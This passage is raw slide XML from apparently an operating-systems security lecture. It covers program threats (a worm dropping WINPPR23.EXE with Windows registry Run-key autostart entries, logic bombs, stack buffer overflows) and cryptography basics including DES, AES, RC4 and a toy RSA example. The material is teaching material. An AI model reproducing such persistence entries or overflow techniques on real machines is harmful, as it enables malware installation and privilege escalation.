                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>WINPPR23.EXE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>in default Windows system directory</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Plus the Windows Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Helvetica" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" charset="0"/>
              <a:buNone/>
            </a:pP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   [HKCU\SOFTWARE\Microsoft\Windows\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CurrentVersion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\Run] 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   "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TrayX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" = %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windir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%\winppr32.exe /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sinc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[HKLM\SOFTWARE\Microsoft\Windows\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CurrentVersion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\Run] </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:b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   "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TrayX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" = %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windir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>%\winppr32.exe /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>sinc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
              <a:cs typeface="Courier New" charset="0"/>
            </a:endParaRP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31266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41288"/>
            <a:ext cx="7967662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Cryptography as a Security Tool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55688"/>
            <a:ext cx="7042150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Broadest security tool available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Internal to a given computer, source and destination of messages can be known and protected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OS creates, manages, protects process IDs, communication ports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Source and destination of messages on network cannot be trusted without cryptography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Local network – IP address?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Consider unauthorized host added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WAN / Internet – how to establish authenticity </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Not via IP address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2905935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41425" y="114300"/>
            <a:ext cx="7445375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Program Threats (Cont.)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82000" cy="4530725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Logic Bomb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Program that initiates a security incident under certain circumstances</a:t>
            </a:r>
          </a:p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Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic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Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>and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Buffer Overflow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Exploits a bug in a program (overflow either the stack or memory buffers)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Failure to check bounds on inputs, arguments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Write past arguments on the stack into the return address on stack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When routine returns from call, returns to hacked address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Pointed to code loaded onto stack that executes malicious code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Unauthorized user or privilege escalation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291626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27000"/>
            <a:ext cx="8229600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Cryptography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820738" y="1138238"/>
            <a:ext cx="6589712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Means to constrain potential senders (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>sources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>) and / or receivers (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>destinations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>) of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>messages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Based on secrets (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keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Enables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Confirmation of source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Receipt only by certain destination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Trust relationship between sender and receiver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Helvetica" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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29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Encryption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762000"/>
            <a:ext cx="7081838" cy="5173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Constrains the set of possible receivers of a message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Encryption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> algorithm consists of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Set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of keys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Set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 of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Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i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 of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>ciphertexts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> (encrypted messages)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E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→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>). 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E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a function for generating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>ciphertexts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> from messages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E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E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D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C </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>→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). 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i="1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is a function for generating messages from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>ciphertexts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRP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D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D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</p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="190216040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Encryption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71563"/>
            <a:ext cx="6673850" cy="51736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An encryption algorithm must provide this essential property: Given a ciphertext c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>C, a computer can compute m such that E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="-25000">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>(m) = c only if it possesses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Thus, a computer holding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>can decrypt ciphertexts to the plaintexts used to produce them, but a computer not holding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>cannot decrypt ciphertexts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Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Since ciphertexts are generally exposed (for example, sent on the network), it is important that it be infeasible to derive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>
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> from the ciphertexts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11595892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Symmetric Encryption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4713" y="1042988"/>
            <a:ext cx="7696200" cy="4530725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Same key used to encrypt and decrypt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Therefore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> must be kept secret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>DES was most commonly used symmetric block-encryption algorithm (created by US Govt)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Encrypts a block of data at a time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Keys too short so now considered insecure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Triple-DES considered more secure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Algorithm used 3 times using 2 or 3 keys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For example </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>2001 NIST adopted new block cipher - Advanced Encryption Standard (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>AES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>)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Keys of 128, 192, or 256 bits, works on 128 bit blocks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>RC4 is most common symmetric stream cipher, but known to have vulnerabilities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Encrypts/decrypts a stream of bytes (i.e., wireless transmission)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Key is a input to pseudo-random-bit generator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Generates an infinite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>keystream</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32772" name="Picture 1" descr="Screen Shot 2013-02-18 at 5.34.2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63" y="3608388"/>
            <a:ext cx="155733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91414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077913" y="177800"/>
            <a:ext cx="8053387" cy="449263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MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Secure Communication over Insecure Medium</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3379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925" y="1065213"/>
            <a:ext cx="5005388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9970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8475" y="155575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Asymmetric Encryption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3438" y="685800"/>
            <a:ext cx="6837362" cy="4530725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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Public-key encryption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>based on each user having two keys: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public key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>– published key used to encrypt data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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private key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>– key known only to individual user used to decrypt data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Must be an encryption scheme that can be made public without making it easy to figure out the decryption scheme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Most common is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RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> block cipher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Efficient algorithm for testing whether or not a number is prime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No efficient algorithm is know for finding the prime factors of a number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325106993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41288"/>
            <a:ext cx="7713662" cy="576262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Asymmetric Encryption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9000" y="1082675"/>
            <a:ext cx="6877050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Formally, it is computationally infeasible to derive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 i="1" baseline="-25000">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>d,N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> from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 i="1" baseline="-25000">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>e,N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, and so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 i="1" baseline="-25000">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> need not be kept secret and can be widely disseminated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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 i="1" baseline="-25000">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> is the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public key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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 i="1" baseline="-25000">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> is the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private key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>N </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>is the product of two large, randomly chosen prime numbers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>q </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>(for example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>q </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>are 512 bits each)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Encryption algorithm is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="-25000">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>ke,N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m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="30000">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="12000">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1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mod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>, where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 i="1" baseline="-25000">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1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satisfies 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 i="1" baseline="-25000">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="-25000">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>mod (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>−1)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>q </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>−1) = 1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The decryption algorithm is then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="-25000">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>kd,N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="30000">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" baseline="12000">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>mod </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r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4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155575"/>
            <a:ext cx="7440613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Asymmetric Encryption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609600"/>
            <a:ext cx="8763000" cy="5427662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For example. make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>= 7and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>q </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>= 13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We then calculate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>N </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>= 7∗13 = 91 and (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
